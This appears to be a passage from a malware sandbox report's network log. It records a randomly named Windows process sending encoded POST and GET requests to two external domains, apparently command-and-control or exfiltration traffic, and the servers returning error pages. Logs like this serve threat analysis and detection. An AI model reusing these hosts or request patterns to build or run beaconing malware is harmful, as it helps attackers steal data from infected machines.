Aug 6, 2024 08:00:07.049094915 CEST	821	OUT	POST /6ujs/ HTTP/1.1 Host: www.6666580a9.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.6666580a9.shop Referer: http://www.6666580a9.shop/6ujs/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2f 4c 4d 44 42 67 32 53 76 73 5a 72 48 34 7a 52 47 71 66 35 50 4f 2b 73 58 71 7a 52 77 37 78 59 57 57 68 36 50 39 64 70 6e 72 75 36 70 38 45 41 37 4c 4d 35 4d 63 43 63 70 75 52 64 59 65 75 63 31 58 75 34 72 58 7a 67 47 52 5a 38 71 2f 78 41 58 36 62 67 64 64 57 44 79 6e 51 30 47 47 2f 70 71 75 77 54 48 49 77 75 64 65 50 74 63 4a 35 56 52 36 37 38 64 6b 4b 6e 38 58 65 41 77 64 30 53 32 57 31 39 6b 72 4f 54 4f 74 6e 4a 33 59 54 78 79 47 77 32 50 46 7a 57 66 6a 30 79 54 4e 33 47 53 57 66 57 49 49 4a 6d 72 58 75 47 52 68 5a 4b 47 74 76 62 63 64 2b 38 4b 67 4b 6c 52 57 71 6d 51 44 68 79 39 46 53 68 77 67 42 7a 39 37 6b 47 75 70 56 6f 49 79 5a 50 4c 6c 4e 6c 2f 4e 32 36 69 78 68 4d 39 69 51 3d Data Ascii: wLTtn0=/LMDBg2SvsZrH4zRGqf5PO+sXqzRw7xYWWh6P9dpnru6p8EA7LM5McCcpuRdYeuc1Xu4rXzgGRZ8q/xAX6bgddWDynQ0GG/pquwTHIwudePtcJ5VR678dkKn8XeAwd0S2W19krOTOtnJ3YTxyGw2PFzWfj0yTN3GSWfWIIJmrXuGRhZKGtvbcd+8KgKlRWqmQDhy9FShwgBz97kGupVoIyZPLlNl/N26ixhM9iQ=
Aug 6, 2024 08:00:07.611733913 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 06:00:07 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49761	64.64.253.144	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:09.594558954 CEST	1834	OUT	POST /6ujs/ HTTP/1.1 Host: www.6666580a9.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.6666580a9.shop Referer: http://www.6666580a9.shop/6ujs/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 2f 4c 4d 44 42 67 32 53 76 73 5a 72 48 34 7a 52 47 71 66 35 50 4f 2b 73 58 71 7a 52 77 37 78 59 57 57 68 36 50 39 64 70 6e 72 32 36 70 4f 38 41 37 6f 55 35 64 73 43 63 6c 4f 52 63 59 65 76 45 31 57 48 78 72 58 76 77 47 54 52 38 6c 34 78 41 53 50 33 67 4b 4e 57 44 71 6e 51 35 4c 6d 2f 38 71 71 63 58 48 49 67 75 64 65 50 74 63 4c 68 56 58 75 76 38 66 6b 4b 67 35 58 65 63 30 64 30 75 32 53 5a 48 6b 72 4c 6b 4f 37 58 4a 35 62 72 78 77 31 49 32 53 31 7a 55 63 6a 30 51 54 4e 37 6a 53 57 7a 38 49 4a 74 49 72 58 47 47 55 56 4d 4e 56 63 62 57 4e 50 71 50 4a 79 4f 68 54 45 6d 53 5a 45 4e 43 33 57 36 4f 77 67 64 38 79 63 73 58 6d 65 45 54 5a 52 6c 53 4d 30 4a 41 32 4a 37 52 39 7a 46 37 6f 6e 72 33 63 46 6c 7a 58 4f 61 69 6f 41 57 45 4d 69 34 56 71 63 38 68 76 62 75 62 71 79 78 34 67 38 69 67 46 66 31 37 79 35 62 38 76 52 32 53 4e 79 62 65 50 37 53 34 30 6c 6c 61 48 59 69 61 70 35 6f 59 36 52 6f 4d 70 6b 6c 66 6e 38 2b 52 37 46 69 4d 63 43 4a 71 55 69 39 57 4d 44 4e 37 6c 37 64 45 56 66 51 [TRUNCATED] Data Ascii: wLTtn0=/LMDBg2SvsZrH4zRGqf5PO+sXqzRw7xYWWh6P9dpnr26pO8A7oU5dsCclORcYevE1WHxrXvwGTR8l4xASP3gKNWDqnQ5Lm/8qqcXHIgudePtcLhVXuv8fkKg5Xec0d0u2SZHkrLkO7XJ5brxw1I2S1zUcj0QTN7jSWz8IJtIrXGGUVMNVcbWNPqPJyOhTEmSZENC3W6Owgd8ycsXmeETZRlSM0JA2J7R9zF7onr3cFlzXOaioAWEMi4Vqc8hvbubqyx4g8igFf17y5b8vR2SNybeP7S40llaHYiap5oY6RoMpklfn8+R7FiMcCJqUi9WMDN7l7dEVfQ002DfKAuUT3Bo4jrRDrDi4ZA4/W8cWHAzLCUeGr8GPUsR1DdCC1E+OzD8RpBSgvInW+aILu8rMNji05VvzILLHXqHi0iFJYz6PO2HTuVHsbowjni867Fcsdq9qsmMCUEILxlh5SHnSHzx14IwJVdO6SkdXkaCO9NuJqteBnOkwrvwLds0Mn81c8F5scEG0WEbCr6koW1Z0N2kZZrhvI2fP4hSOPEJJKynpZVQmkaZ7pohKJuGqJkKImurz2dOpLr1GSSEN1m9h4mPVHHYyjcrGRojQCOd+0CwQ6vLJJmgHh8v6Rt4uZKIF82ymyM8FwOMl4U8gY9YDTA1T7iBVaww6xKzH4xyNm5d+WxAdCbL7npN9Ecj1U2VESHNeZq/HakEdd6VGcX7Rcj3TTPRqfgDww05S7iT1vvDpU3VpOdvjVOE621FtcNROf0nYis/FHqIMqXut2gjGOK2ixOuImtV9aUdX5oB2jnc8TrHUykTjFcULjMxv09Ps7+GDRIom6WDRTh+5gJenDwgdLCGWf43qhK4VLuePV3N0+Awjolqa4BC/FZ1EsIQHb5VJdiM1yyy2IsDySz++4IiNCvyT/Z6Gk0VIsysPtO2aVFI0MOokgi3dFZ/ywhpQjZ5s3oQ7TOQWCtndceTzDat+NqQKx9UB94gIAdZYpGw7 [TRUNCATED]
Aug 6, 2024 08:00:10.152914047 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 06:00:10 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49762	64.64.253.144	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:12.137753963 CEST	538	OUT	GET /6ujs/?wLTtn0=yJkjCVuH35Z3Y4uWL4mXIpKsUoOhw5Ntfm93bfMPuqWkl8sQ3LA1Sv6pqP1navOonkOYgjHPfG96mMYvY8eBIuOm214hMSjoqIkQFvMydMaNRvs9I/qBWmD1+lOL1Msb2HletZybPt30&K4G=Thy4J4VXH8ud HTTP/1.1 Host: www.6666580a9.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Aug 6, 2024 08:00:12.699265957 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 06 Aug 2024 06:00:12 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49763	104.21.17.191	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:17.761635065 CEST	801	OUT	POST /utgc/ HTTP/1.1 Host: www.moodplay.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 219 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.moodplay.store Referer: http://www.moodplay.store/utgc/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 77 59 32 63 30 37 32 58 76 75 2f 47 50 30 45 44 45 62 51 72 52 79 64 4e 56 46 49 57 72 70 50 41 36 71 54 4b 74 62 77 72 4c 39 53 50 44 76 7a 33 68 2f 67 4e 4d 46 50 52 32 37 59 37 2b 57 46 35 37 33 66 50 4c 4a 52 34 49 45 52 6a 36 38 78 74 55 6e 7a 38 4c 68 72 77 32 6d 36 79 73 6d 33 63 2b 50 30 52 6b 48 32 50 4c 4e 37 36 49 76 4b 69 6c 73 54 4b 54 6c 49 70 31 55 76 57 4b 6d 7a 56 57 79 67 2f 70 64 6a 36 4a 43 38 6e 41 41 54 6b 31 57 78 76 37 37 4a 71 4f 76 37 56 73 59 6c 38 73 37 46 51 64 77 6b 64 43 5a 66 4d 77 6b 52 32 76 5a 55 71 2b 44 4b 50 55 62 79 61 4b 46 54 47 2f 44 77 4c 44 48 76 4f 4b 56 37 63 30 4c 4e 36 51 3d 3d Data Ascii: wLTtn0=9wY2c072Xvu/GP0EDEbQrRydNVFIWrpPA6qTKtbwrL9SPDvz3h/gNMFPR27Y7+WF573fPLJR4IERj68xtUnz8Lhrw2m6ysm3c+P0RkH2PLN76IvKilsTKTlIp1UvWKmzVWyg/pdj6JC8nAATk1Wxv77JqOv7VsYl8s7FQdwkdCZfMwkR2vZUq+DKPUbyaKFTG/DwLDHvOKV7c0LN6Q==
Aug 6, 2024 08:00:18.404103994 CEST	1143	IN	HTTP/1.1 405 Not Allowed Date: Tue, 06 Aug 2024 06:00:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFhib1wUBEjiJLTXaVBerPo3wDsQMTOKU%2BL3btBJSa2XDFxLFF2SG3GLNjIF5teHQbRmJojfehman%2FdWpcpqGM3HGTKxJQlDMpe01YSKmKHzQ6HjQC6WdfzGP%2BAiOxDf56idNHc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8aecce497d1342e5-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49764	104.21.17.191	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:20.311768055 CEST	821	OUT	POST /utgc/ HTTP/1.1 Host: www.moodplay.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.moodplay.store Referer: http://www.moodplay.store/utgc/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 77 59 32 63 30 37 32 58 76 75 2f 45 76 45 45 50 46 62 51 73 78 79 61 52 6c 46 49 64 4c 6f 45 41 36 57 54 4b 76 33 67 6f 35 70 53 50 6a 2f 7a 30 6c 4c 67 49 4d 46 50 61 57 37 5a 2f 2b 58 6f 35 37 36 73 50 50 4e 52 34 4c 34 52 6a 37 4d 78 74 6e 2f 38 2b 62 68 2b 32 32 6d 34 76 63 6d 33 63 2b 50 30 52 6b 36 2b 50 4c 56 37 39 37 6e 4b 69 45 73 53 57 44 6c 4a 75 31 55 76 53 4b 6d 33 56 57 79 65 2f 6f 41 4d 36 4c 4b 38 6e 41 51 54 6b 6e 2b 79 67 37 37 4c 6b 75 75 30 59 70 46 53 77 75 62 6a 4b 62 30 4b 62 7a 52 4b 4e 47 35 7a 73 4e 56 34 30 76 37 78 4c 57 2f 45 4e 73 59 6d 45 2b 48 6f 47 68 7a 4f 52 39 77 52 52 6d 71 4a 73 6a 39 75 4b 70 69 75 59 73 68 4f 39 79 69 72 38 79 76 66 57 6a 4d 3d Data Ascii: wLTtn0=9wY2c072Xvu/EvEEPFbQsxyaRlFIdLoEA6WTKv3go5pSPj/z0lLgIMFPaW7Z/+Xo576sPPNR4L4Rj7Mxtn/8+bh+22m4vcm3c+P0Rk6+PLV797nKiEsSWDlJu1UvSKm3VWye/oAM6LK8nAQTkn+yg77Lkuu0YpFSwubjKb0KbzRKNG5zsNV40v7xLW/ENsYmE+HoGhzOR9wRRmqJsj9uKpiuYshO9yir8yvfWjM=
Aug 6, 2024 08:00:20.963104963 CEST	1143	IN	HTTP/1.1 405 Not Allowed Date: Tue, 06 Aug 2024 06:00:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7AZTqo0P40KO16VrFcN4JoRTHXyd657w0sHtvw3qGM0kbz3q61ZLnaHJ2XcHdNAq5cf45aFgagdPD5MDYBFdvoyTV81gbD3NY4Hrx097DkiSudr%2B7SZru3HfdNGbJ%2FBQanYqO%2F8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8aecce5979d643d3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49765	104.21.17.191	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 08:00:22.859719038 CEST	1834	OUT	POST /utgc/ HTTP/1.1 Host: www.moodplay.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.moodplay.store Referer: http://www.moodplay.store/utgc/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 39 77 59 32 63 30 37 32 58 76 75 2f 45 76 45 45 50 46 62 51 73 78 79 61 52 6c 46 49 64 4c 6f 45 41 36 57 54 4b 76 33 67 6f 35 52 53 49 51 6e 7a 30 45 4c 67 50 4d 46 50 47 47 37 63 2f 2b 57 71 35 37 79 67 50 50 42 72 34 4e 30 52 69 64 51 78 72 57 2f 38 30 62 68 2b 30 32 6d 37 79 73 6d 59 63 2b 66 77 52 6b 4b 2b 50 4c 56 37 39 36 33 4b 32 46 73 53 47 7a 6c 49 70 31 55 72 57 4b 6d 50 56 57 4b 6f 2f 6f 45 6d 35 37 71 38 6e 68 67 54 68 53 4b 79 70 37 37 4e 6c 65 76 72 59 70 42 4e 77 75 58 56 4b 62 6f 67 62 77 78 4b 41 77 4d 66 77 65 5a 43 71 64 33 37 43 32 6a 33 59 38 77 6e 4f 2b 44 77 4c 6d 66 61 63 39 78 6c 58 6d 65 34 34 7a 73 50 64 6f 76 63 63 65 74 65 34 56 36 37 6b 43 33 46 4c 6d 39 39 69 51 35 6b 35 34 30 50 48 6e 6f 76 4a 2b 4e 4f 32 56 50 51 33 37 6f 66 50 41 4b 69 4c 49 78 4c 4d 37 36 4b 6e 2f 32 72 58 69 50 75 6f 6d 4b 4b 69 6a 6d 4e 4a 4e 75 73 42 73 72 63 6e 30 59 76 41 72 64 33 55 64 62 37 63 6c 61 4d 4a 37 54 6e 6e 62 4a 79 42 6a 61 4c 2f 7a 55 70 42 66 6f 64 61 49 67 [TRUNCATED] Data Ascii: wLTtn0=9wY2c072Xvu/EvEEPFbQsxyaRlFIdLoEA6WTKv3go5RSIQnz0ELgPMFPGG7c/+Wq57ygPPBr4N0RidQxrW/80bh+02m7ysmYc+fwRkK+PLV7963K2FsSGzlIp1UrWKmPVWKo/oEm57q8nhgThSKyp77NlevrYpBNwuXVKbogbwxKAwMfweZCqd37C2j3Y8wnO+DwLmfac9xlXme44zsPdovccete4V67kC3FLm99iQ5k540PHnovJ+NO2VPQ37ofPAKiLIxLM76Kn/2rXiPuomKKijmNJNusBsrcn0YvArd3Udb7claMJ7TnnbJyBjaL/zUpBfodaIgnjBvrDIfRN1g5CObBYcRhXB4nufs1f3vvZVE+3RlT6XfGG657xkoczHaWQiTkw1V9v5je5+zIFgWNXiMiOFwLqPzcDUL4QfFg11HDU2YkDEz5jg3CCoNL8/EDvR/sZh3dXXsOWNFB79/zFccLnGAu+b303Q1RfoLqHy0d5HmwgStMPwdWOmlzOn5E7LsTqnVa6FayGQLLpvxINTtIYFgR1yKmFmpmXksLg5SlJSVkEsZ21RKuIwJY+NPMI1uTUmuLvmRDCupo2c3nBm5tOJC1i+G3Kvb+QoRZORxADpJUWPwKbkkoyRCuKTHHtTGJ1fUJNk0GW9OECSPxwoxAwMrnoLBGfqoyUrIofVZY6Wo6D7xs+N6mg31SBGz2U0bjpiy/uHeUy5yGdG1fTjCX9uale+AdxXB9aGhBecyx2y+a0UmGYLE2e0omY/K+X7X9Asxo7NHz9KkaKVr0/1obsW10R3fsTNQAJENdYkAbnVvmmfWW8QT7baAnBAH8oXi2PscDzX6BWeMjIdWvyuVUnTES//IICAujSS3FaNa2tYmoYOKwPC+boKzrr4KBEVKQJunSRhHin22wkIJ6qqD4TUta4gVdJoH9WKpdkWKx4ZEEax8WLpGfuIsvI4RVXTdizuPtG71pgTOcTlUsoF7GmzjIeEBOsjfqtqDsz [TRUNCATED]
